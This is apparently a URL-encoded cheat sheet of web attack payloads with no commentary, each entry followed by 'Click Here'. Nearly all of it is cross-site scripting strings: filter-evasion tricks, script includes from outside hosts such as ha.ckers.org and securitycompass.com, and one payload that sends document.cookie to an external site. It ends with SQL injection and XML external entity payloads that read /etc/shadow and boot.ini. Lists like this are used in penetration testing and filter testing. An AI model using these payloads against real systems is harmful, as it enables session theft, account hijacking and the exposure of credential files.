%3c%3bTABLE%20BACKGROUND%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%22%3b%3e%3b%3c%3b%2fTABLE%3e%3bClick Here

%3c%3bTABLE%3e%3b%3c%3bTD%20BACKGROUND%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%22%3b%3e%3b%3c%3b%2fTD%3e%3b%3c%3b%2fTABLE%3e%3bClick Here

%3c%3bHTML%20xmlns%3axss%3e%3bClick Here

%3c%3bXML%20ID%3dI%3e%3b%3c%3bX%3e%3b%3c%3bC%3e%3b%3c%3b![CDATA[%3c%3bIMG%20SRC%3d%22%3bjavas]]%3e%3b%3c%3b![CDATA[cript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3b]]%3e%3bClick Here

%3c%3bXML%20ID%3d%22%3bxss%22%3b%3e%3b%3c%3bI%3e%3b%3c%3bB%3e%3b%3c%3bIMG%20SRC%3d%22%3bjavas%3c%3b!--%20--%3e%3bcript%3aalert('%3bXSS'%3b)%22%3b%3e%3b%3c%3b%2fB%3e%3b%3c%3b%2fI%3e%3b%3c%3b%2fXML%3e%3bClick Here

%3c%3bXML%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxsstest%2exml%22%3b%20ID%3dI%3e%3b%3c%3b%2fXML%3e%3bClick Here

%3c%3bMETA%20HTTP-EQUIV%3d%22%3bSet-Cookie%22%3b%20Content%3d%22%3bUSERID%3d%3c%3bSCRIPT%3e%3balert('%3bXSS'%3b)%3c%3b%2fSCRIPT%3e%3b%22%3b%3e%3bClick Here

%3c%3bHTML%3e%3b%3c%3bBODY%3e%3bClick Here

%3c%3b!--[if%20gte%20IE%204]%3e%3b%20%20%20%20%20%20%20%20%20%20%20Click Here

%3c%3bSCRIPT%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejpg%22%3b%3e%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bXSS%20STYLE%3d%22%3bbehavior%3a%20url(http%3a%2f%2fha%2eckers%2eorg%2fxss%2ehtc)%3b%22%3b%3e%3bClick Here

%3c%3b%3f%20echo('%3b%3c%3bSCR)'%3b%3bClick Here

%3c%3b!--%23exec%20cmd%3d%22%3b%2fbin%2fecho%20'%3b%3c%3bSCRIPT%20SRC'%3b%22%3b--%3e%3b%3c%3b!--%23exec%20cmd%3d%22%3b%2fbin%2fecho%20'%3b%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3e%3b%3c%3b%2fSCRIPT%3e%3b'%3b%22%3b--%3e%3bClick Here

%3c%3bBR%20SIZE%3d%22%3b%26%3b%7balert('%3bXSS'%3b)%7d%22%3b%3e%3bClick Here

%3c%3bIMG%20SRC%3djavascript%3aalert(%26%3bquot%3bXSS%26%3bquot%3b)%3e%3bClick Here

%3c%3bIMG%20SRC%3dJaVaScRiPt%3aalert('%3bXSS'%3b)%3e%3bClick Here

%3c%3bIMG%20SRC%3djavascript%3aalert(String%2efromCharCode(88,83,83))%3e%3bClick Here

%3c%3bIMG%20SRC%3d%60javascript%3aalert(%22%3bRSnake%20says,%20'%3bXSS'%3b%22%3b)%60%3e%3bClick Here

%3c%3bHEAD%3e%3b%3c%3bMETA%20HTTP-EQUIV%3d%22%3bCONTENT-TYPE%22%3b%20CONTENT%3d%22%3btext%2fhtml%3b%20charset%3dUTF-7%22%3b%3e%3b%20%3c%3b%2fHEAD%3e%3b%2bADw-SCRIPT%2bAD4-alert('%3bXSS'%3b)%3b%2bADw-%2fSCRIPT%2bAD4-Click Here

%5c%22%3b%3balert('%3bXSS'%3b)%3b%2f%2fClick Here

%3c%3b%2fTITLE%3e%3b%3c%3bSCRIPT%3e%3balert(%22XSS%22)%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bSTYLE%3e%3b@im%5cport'%3b%5cja%5cvasc%5cript%3aalert(%22%3bXSS%22%3b)'%3b%3b%3c%3b%2fSTYLE%3e%3bClick Here

%3c%3bIMG%20SRC%3d%22%3bjav%26%23x09%3bascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bIMG%20SRC%3d%22%3bjav%26%3b%23x0A%3bascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bIMG%20SRC%3d%22%3bjav%26%3b%23x09%3bascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bIMG%20SRC%3d%22%3bjav%26%3b%23x0D%3bascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

perl%20-e%20'%3bprint%20%22%3b%3c%3bIM%20SRC%3djava%5c0script%3aalert(%22%3bXSS%22%3b)%3e%22%3b%3b'%3b%3e%3b%20outClick Here

perl%20-e%20'%3bprint%20%22%3b%26%3b%3c%3bSCR%5c0IPT%3e%3balert(%22%3bXSS%22%3b)%3c%3b%2fSCR%5c0IPT%3e%3b%22%3b%3b'%3b%20%3e%3b%20outClick Here

%3c%3bIMG%20SRC%3d%22%3b%20%26%3b%2314%3b%20%20javascript%3aalert('%3bXSS'%3b)%3b%22%3b%3e%3bClick Here

%3c%3bSCRIPT%2fXSS%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3b%3e%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bSCRIPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejsClick Here

%3c%3bBODY%20onload!%23$%%26%3b()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3dalert(%22%3bXSS%22%3b)%3e%3bClick Here

%3c%3bSCRIPT%20SRC%3d%2f%2fha%2eckers%2eorg%2f%2ej%3e%3bClick Here

%3c%3bIMG%20SRC%3d%22%3bjavascript%3aalert('%3bXSS'%3b)%22%3bClick Here

%3c%3bIFRAME%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%20%3c%3bClick Here

%3c%3bIMG%20%22%3b%22%3b%22%3b%3e%3b%3c%3bSCRIPT%3e%3balert(%22%3bXSS%22%3b)%3c%3b%2fSCRIPT%3e%3b%22%3b%3e%3bClick Here

%3c%3b%3c%3bSCRIPT%3e%3balert(%22%3bXSS%22%3b)%3b%2f%2f%3c%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bSCRIPT%3e%3ba%3d%2fXSS%2fClick Here

%3c%3bSCRIPT%20a%3d%22%3b%3e%3b%22%3b%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3b%3e%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bSCRIPT%20%3d%22%3bblah%22%3b%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3b%3e%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bSCRIPT%20a%3d%22%3bblah%22%3b%20'%3b'%3b%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3b%3e%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bSCRIPT%20%22%3ba%3d'%3b%3e%3b'%3b%22%3b%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3b%3e%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bSCRIPT%20a%3d%60%3e%3b%60%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3b%3e%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bhttp%3a%2f%2f66%2e102%2e7%2e147%2f%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bSCRIPT%3e%3bdocument%2ewrite(%22%3b%3c%3bSCRI%22%3b)%3b%3c%3b%2fSCRIPT%3e%3bPT%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3b%3e%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bSCRIPT%20a%3d%22%3b%3e'%3b%3e%22%3b%20SRC%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3b%3e%3b%3c%3b%2fSCRIPT%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bhttp%3a%2f%2f1113982867%2f%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bhttp%3a%2f%2f%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bhttp%3a%2f%2f0x42%2e0x0000066%2e0x7%2e0x93%2f%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bhttp%3a%2f%2f0102%2e0146%2e0007%2e00000223%2f%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bh%26%23x0A%3btt%26%2309%3bp%3a%2f%2f6%26%3b%2309%3b6%2e000146%2e0x7%2e147%2f%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3b%2f%2fgoogle%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3b%2f%2fwww%2egoogle%2ecom%2f%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bhttp%3a%2f%2fha%2eckers%2eorg@google%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bhttp%3a%2f%2fgoogle%3aha%2eckers%2eorg%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bjavascript%3adocument%2elocation%3d'%3bhttp%3a%2f%2fwww%2egoogle%2ecom%2f'%3b%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bhttp%3a%2f%2fgoogle%2ecom%2f%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bhttp%3a%2f%2fwww%2egohttp%3a%2f%2fwww%2egoogle%2ecom%2fogle%2ecom%2f%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3c%3bA%20HREF%3d%22%3bhttp%3a%2f%2fwww%2egoogle%2ecom%2e%2f%22%3b%3e%3bXSS%3c%3b%2fA%3e%3bClick Here

%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%3cimg%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20SRC%3d%22jav%20ascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cbody%20onload!%23$%%26()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3ddocument%2evulnerable%3dtrue%3b%3eClick Here

%3cimg%20SRC%3d%22%20%26%2314%3b%20javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3c%3cSCRIPT%3edocument%2evulnerable%3dtrue%3b%2f%2f%3c%3c%2fSCRIPT%3eClick Here

%3cscript%20%3cB%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%3cimg%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22Click Here

%3ciframe%20src%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%20%3cClick Here

%5c%22%3bdocument%2evulnerable%3dtrue%3b%3b%2f%2fClick Here

%3cscript%3ea%3d%2fXSS%2f%5cndocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%3c%2ftitle%3e%3cSCRIPT%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%3cinput%20TYPE%3d%22IMAGE%22%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cbody%20ONLOAD%3ddocument%2evulnerable%3dtrue%3b%3eClick Here

%3cimg%20DYNSRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cbody%20BACKGROUND%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20LOWSRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cbgsound%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cLAYER%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3e%3c%2fLAYER%3eClick Here

%3cbr%20SIZE%3d%22%26%7bdocument%2evulnerable%3dtrue%7d%22%3eClick Here

%3clink%20REL%3d%22stylesheet%22%20HREF%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

1script3document%2evulnerable%3dtrue%3b1%2fscript3Click Here

%3cimg%20SRC%3d'vbscript%3adocument%2evulnerable%3dtrue%3b'%3eClick Here

%3cstyle%3eli%20%7blist-style-image%3a%20url(%22javascript%3adocument%2evulnerable%3dtrue%3b%22)%3b%3c%2fSTYLE%3e%3cUL%3e%3cLI%3eXSSClick Here

%3cmeta%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3b%20URL%3dhttp%3a%2f%2f%3bURL%3djavascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cmeta%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3djavascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3ctable%20BACKGROUND%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cFRAMESET%3e%3cFRAME%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3e%3c%2fframeset%3eClick Here

%3cIFRAME%20SRC%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3e%3c%2fiframe%3eClick Here

%3ctable%3e%3cTD%20BACKGROUND%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cdiv%20STYLE%3d%22background-image%3a%20url(javascript%3adocument%2evulnerable%3dtrue%3b)%22%3eClick Here

%3cdiv%20STYLE%3d%22background-image%3a%20url(%26%231%3bjavascript%3adocument%2evulnerable%3dtrue%3b)%22%3eClick Here

%3cdiv%20STYLE%3d%22width%3a%20expression(document%2evulnerable%3dtrue)%3b%22%3eClick Here

santanuClick Here

%3cstyle%3e@im%5cport'%5cja%5cvasc%5cript%3adocument%2evulnerable%3dtrue'%3b%3c%2fstyle%3eClick Here

%3cXSS%20STYLE%3d%22xss%3aexpression(document%2evulnerable%3dtrue)%22%3eClick Here

%3cimg%20STYLE%3d%22xss%3aexpr%2f%2aXSS%2a%2fession(document%2evulnerable%3dtrue)%22%3eClick Here

%3cstyle%20TYPE%3d%22text%2fjavascript%22%3edocument%2evulnerable%3dtrue%3b%3c%2fstyle%3eClick Here

exp%2f%2a%3cA%20STYLE%3d'no%5cxss%3anoxss(%22%2a%2f%2f%2a%22)%3bxss%3aex%2f%2aXSS%2a%2f%2f%2a%2f%2a%2fpression(document%2evulnerable%3dtrue)'%3eClick Here

%3cstyle%3e%2eXSS%7bbackground-image%3aurl(%22javascript%3adocument%2evulnerable%3dtrue%22)%3b%7d%3c%2fSTYLE%3e%3cA%20CLASS%3dXSS%3e%3c%2fa%3eClick Here

%3cstyle%20type%3d%22text%2fcss%22%3eBODY%7bbackground%3aurl(%22javascript%3adocument%2evulnerable%3dtrue%22)%7d%3c%2fstyle%3eClick Here

%3c!--[if%20gte%20IE%204]%3e%3cSCRIPT%3edocument%2evulnerable%3dtrue%3b%3c%2fSCRIPT%3e%3c![endif]--%3eClick Here

%3cOBJECT%20classid%3dclsid%3aae24fdae-03c6-11d1-8b76-0080c744f389%3e%3cparam%20name%3durl%20value%3djavascript%3adocument%2evulnerable%3dtrue%3e%3c%2fobject%3eClick Here

%3cbase%20HREF%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%2f%2f%22%3eClick Here

%3cXML%20ID%3dI%3e%3cX%3e%3cC%3e%3c![%3cIMG%20SRC%3d%22javas]]%3c![cript%3adocument%2evulnerable%3dtrue%3b%22%3e]]%3c%2fC%3e%3c%2fX%3e%3c%2fxml%3e%3cSPAN%20DATASRC%3d%23I%20DATAFLD%3dC%20DATAFORMATAS%3dHTML%3e%3c%2fspan%3eClick Here

%3cXML%20ID%3d%22xss%22%3e%3cI%3e%3cB%3e%3cIMG%20SRC%3d%22javas%3c!--%20--%3ecript%3adocument%2evulnerable%3dtrue%22%3e%3c%2fB%3e%3c%2fI%3e%3c%2fXML%3e%3cSPAN%20DATASRC%3d%22%23xss%22%20DATAFLD%3d%22B%22%20DATAFORMATAS%3d%22HTML%22%3e%3c%2fspan%3eClick Here

%3cmeta%20HTTP-EQUIV%3d%22Set-Cookie%22%20Content%3d%22USERID%3d%3cSCRIPT%3edocument%2evulnerable%3dtrue%3c%2fSCRIPT%3e%22%3eClick Here

%3c%3f%20echo('%3cSCR)'%3becho('IPT%3edocument%2evulnerable%3dtrue%3c%2fSCRIPT%3e')%3b%20%3f%3eClick Here

%3chead%3e%3cMETA%20HTTP-EQUIV%3d%22CONTENT-TYPE%22%20CONTENT%3d%22text%2fhtml%3b%20charset%3dUTF-7%22%3e%20%3c%2fHEAD%3e%2bADw-SCRIPT%2bAD4-document%2evulnerable%3dtrue%3b%2bADw-%2fSCRIPT%2bAD4-Click Here

%3cdiv%20onmouseover%3d%22document%2evulnerable%3dtrue%3b%22%3eClick Here

%3ca%20href%3d%22javascript%23document%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20src%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20dynsrc%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%26%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%3cbgsound%20src%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cinput%20type%3d%22image%22%20dynsrc%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20src%3d%26%7bdocument%2evulnerable%3dtrue%3b%7d%3b%3eClick Here

%26%7bdocument%2evulnerable%3dtrue%3b%7d%3bClick Here

%3clink%20rel%3d%22stylesheet%22%20href%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3ciframe%20src%3d%22vbscript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20src%3d%22mocha%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cimg%20src%3d%22livescript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cbody%20onload%3d%22document%2evulnerable%3dtrue%3b%22%3eClick Here

%3ca%20href%3d%22about%3a%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3e%22%3eClick Here

%3cmeta%20http-equiv%3d%22refresh%22%20content%3d%220%3burl%3djavascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cdiv%20style%3d%22background-image%3a%20url(javascript%3adocument%2evulnerable%3dtrue%3b)%3b%22%3eClick Here

%3cdiv%20style%3d%22behaviour%3a%20url([link%20to%20code])%3b%22%3eClick Here

%3cstyle%20type%3d%22text%2fjavascript%22%3edocument%2evulnerable%3dtrue%3b%3c%2fstyle%3eClick Here

%3cdiv%20style%3d%22width%3a%20expression(document%2evulnerable%3dtrue%3b)%3b%22%3eClick Here

%3cdiv%20style%3d%22binding%3a%20url([link%20to%20code])%3b%22%3eClick Here

%3cobject%20classid%3d%22clsid%3a%2e%2e%2e%22%20codebase%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cstyle%3e%3c!--%3c%2fstyle%3e%3cscript%3edocument%2evulnerable%3dtrue%3b%2f%2f--%3e%3c%2fscript%3eClick Here

%3c!--%20--%20--%3e%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3e%3c!--%20--%20--%3eClick Here

%3c%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3eClick Here

%3c![%3c!--]]%3cscript%3edocument%2evulnerable%3dtrue%3b%2f%2f--%3e%3c%2fscript%3eClick Here

%3cimg%20src%3d%22blah%22onmouseover%3d%22document%2evulnerable%3dtrue%3b%22%3eClick Here

%3cxml%20src%3d%22javascript%3adocument%2evulnerable%3dtrue%3b%22%3eClick Here

%3cxml%20id%3d%22X%22%3e%3ca%3e%3cb%3e%3cscript%3edocument%2evulnerable%3dtrue%3b%3c%2fscript%3e%3b%3c%2fb%3e%3c%2fa%3e%3c%2fxml%3eClick Here

%3cdiv%20datafld%3d%22b%22%20dataformatas%3d%22html%22%20datasrc%3d%22%23X%22%3e%3c%2fdiv%3eClick Here

%3cimg%20src%3d%22blah%3e%22%20onmouseover%3d%22document%2evulnerable%3dtrue%3b%22%3eClick Here

[%5cxC0][%5cxBC]script%3edocument%2evulnerable%3dtrue%3b[%5cxC0][%5cxBC]%2fscript%3eClick Here

%3cstyle%3e@import'http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ecss'%3b%3c%2fstyle%3eClick Here

%3cmeta%20HTTP-EQUIV%3d%22Link%22%20Content%3d%22%3chttp%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ecss%3e%3b%20REL%3dstylesheet%22%3eClick Here

%3cOBJECT%20TYPE%3d%22text%2fx-scriptlet%22%20DATA%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fscriptlet%2ehtml%22%3e%3c%2fobject%3eClick Here

%3cstyle%3eBODY%7b-moz-binding%3aurl(%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxssmoz%2exml%23xss%22)%7d%3c%2fstyle%3eClick Here

%3cHTML%20xmlns%3axss%3e%3c%3fimport%20namespace%3d%22xss%22%20implementation%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ehtc%22%3e%3cxss%3axss%3eXSS%3c%2fxss%3axss%3e%3c%2fhtml%3eClick Here

%3cscript%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejpg%22%3e%3c%2fscript%3eClick Here

%3cscript%20a%3d%22%3e%22%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3c!--%23exec%20cmd%3d%22%2fbin%2fecho%20'%3cSCR'%22--%3e%3c!--%23exec%20cmd%3d%22%2fbin%2fecho%20'IPT%20SRC%3dhttp%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%3e%3c%2fSCRIPT%3e'%22--%3eClick Here

%3cscript%20%3d%22%3e%22%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cscript%20a%3d%22%3e%22%20''%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cscript%20%22a%3d'%3e'%22%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cscript%20a%3d%60%3e%60%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cscript%3edocument%2ewrite(%22%3cSCRI%22)%3b%3c%2fSCRIPT%3ePT%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cscript%20a%3d%22%3e'%3e%22%20SRC%3d%22http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs%22%3e%3c%2fscript%3eClick Here

%3cdiv%20style%3d%22binding%3a%20url(http%3a%2f%2fwww%2esecuritycompass%2ecom%2fxss%2ejs)%3b%22%3e%20[Mozilla]Click Here

%22%3b%3e%3b%3c%3bBODY%20onload!%23$%%26%3b()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3dalert(%22%3bXSS%22%3b)%3e%3bClick Here

%3c%3b%2fscript%3e%3b%3c%3bscript%3e%3balert(1)%3c%3b%2fscript%3e%3bClick Here

%3c%3b%2fbr%20style%3da%3aexpression(alert())%3e%3bClick Here

%3c%3bscrscriptipt%3e%3balert(1)%3c%3b%2fscrscriptipt%3e%3bClick Here

perl%20-e%20%26%23039%3bprint%20%5c%22%3b%3c%3bIMG%20SRC%3djava%5c0script%3aalert(%5c%22%3bXSS%5c%22%3b)%3e%3b%5c%22%3b%3b%26%23039%3b%20%3e%3b%20outClick Here

perl%20-e%20%26%23039%3bprint%20%5c%22%3b%3c%3bSCR%5c0IPT%3e%3balert(%5c%22%3bXSS%5c%22%3b)%3c%3b%2fSCR%5c0IPT%3e%3b%5c%22%3b%3b%26%23039%3b%20%3e%3b%20outClick Here

%3c%3bbr%20size%3d%5c%22%3b%26%3b%7balert(%26%23039%3bXSS%26%23039%3b)%7d%5c%22%3b%3e%3bClick Here

%3c~%2fXSS%2f%2a-%2a%2fSTYLE%3dxss%3ae%2f%2a%2a%2fxpression(window%2elocation%3d%22http%3a%2f%2fwww%2eprocheckup%2ecom%2f%3fsid%3d%22%2bdocument%2ecookie)%3eClick Here

%3c~%2fXSS%2f%2a-%2a%2fSTYLE%3dxss%3ae%2f%2a%2a%2fxpression(alert('XSS'))%3eClick Here

%3c~%2fXSS%2f%2a-%2a%2fSTYLE%3dxss%3ae%2f%2a%2a%2fxpression(alert('XSS'))%3eClick Here

%22%3e%3cscript%3ealert('XSS')%3c%2fscript%3eClick Here

%3c~%2fXSS%20STYLE%3dxss%3aexpression(alert('XSS'))%3eClick Here

XSS%2f%2a-%2a%2fSTYLE%3dxss%3ae%2f%2a%2a%2fxpression(alert('XSS'))%3eClick Here

XSS%20STYLE%3dxss%3ae%2f%2a%2a%2fxpression(alert('XSS'))%3eClick Here

%3c%2fXSS%2f%2a-%2a%2fSTYLE%3dxss%3ae%2f%2a%2a%2fxpression(alert('XSS'))%3eClick Here

%3c%2fXSS%20STYLE%3dxss%3aexpression(alert('XSS'))%3eClick Here

%3e%22%3e%3cscript%3ealert(%22XSS%22)%3c%2fscript%3e%26Click Here

%22%3e%3cSTYLE%3e@import%22javascript%3aalert('XSS')%22%3b%3c%2fSTYLE%3eClick Here

%3e%22%27%3e%3cimg%20src%3d%22javascript%3aalert(%27%20XSS%27)%22%3eClick Here

%3e%22'%3e%3cimg%20src%3D%26%23x6a%3b%26%23x61%3b%26%23x76%3b%26%23x61%3b%26%23x73%3b%26%23x63%3b%26%23x72%3b%26%23x69%3b%26%23x70%3b%26%23x74%3b%26%23x3a%3balert(%26quot%3b%26%23x20%3bXSS%26%23x20%3bTest%26%23x20%3bSuccessful%26quot%3b)%3eClick Here

'%uff1cscript%uff1ealert('XSS')%uff1c%2fscript%uff1e'Click Here

''%3b!--%22%3cXSS%3e%3d%26%7b()%7dClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert('XSS')%3eClick Here

%3cIMG%20SRC%3dJaVaScRiPt%3aalert(%26quot%3bXSS%3cWBR%3e%26quot%3b)%3eClick Here

%3cIMG%20SRC%3dJaVaScRiPt%3aalert('XSS')%3eClick Here

%3cIMGSRC%3d%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%3cWBR%3e%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%3cWBR%3e%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%3cWBR%3e%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x0A%3bascript%3aalert(%3cWBR%3e'XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x0D%3bascript%3aalert(%3cWBR%3e'XSS')%3b%22%3eClick Here

%3c![CDATA[%3cscript%3evar%20n%3d0%3bwhile(true)%7bn%2b%2b%3b%7d%3c%2fscript%3e]]%3eClick Here

%3c%3fxml%20version%3d%221%2e0%22%20encoding%3d%22ISO-8859-1%22%3f%3e%3cfoo%3e%3c![CDATA[%3c]]%3eSCRIPT%3c![CDATA[%3e]]%3ealert('gotcha')%3b%3c![CDATA[%3c]]%3e%2fSCRIPT%3c![CDATA[%3e]]%3e%3c%2ffoo%3eClick Here

%3c%3fxml%20version%3d%221%2e0%22%20encoding%3d%22ISO-8859-1%22%3f%3e%3cfoo%3e%3c![CDATA['%20or%201%3d1%20or%20''%3d']]%3e%3c%2ffoof%3eClick Here

%3c%3fxml%20version%3d%221%2e0%22%20encoding%3d%22ISO-8859-1%22%3f%3e%3c!DOCTYPE%20foo%20[%3c!ELEMENT%20foo%20ANY%3e%3c!ENTITY%20xxe%20SYSTEM%20%22file%3a%2f%2fc%3a%2fboot%2eini%22%3e]%3e%3cfoo%3e%26xee%3b%3c%2ffoo%3eClick Here

%3c%3fxml%20version%3d%221%2e0%22%20encoding%3d%22ISO-8859-1%22%3f%3e%3c!DOCTYPE%20foo%20[%3c!ELEMENT%20foo%20ANY%3e%3c!ENTITY%20xxe%20SYSTEM%20%22file%3a%2f%2f%2fetc%2fshadow%22%3e]%3e%3cfoo%3e%26xee%3b%3c%2ffoo%3eClick Here

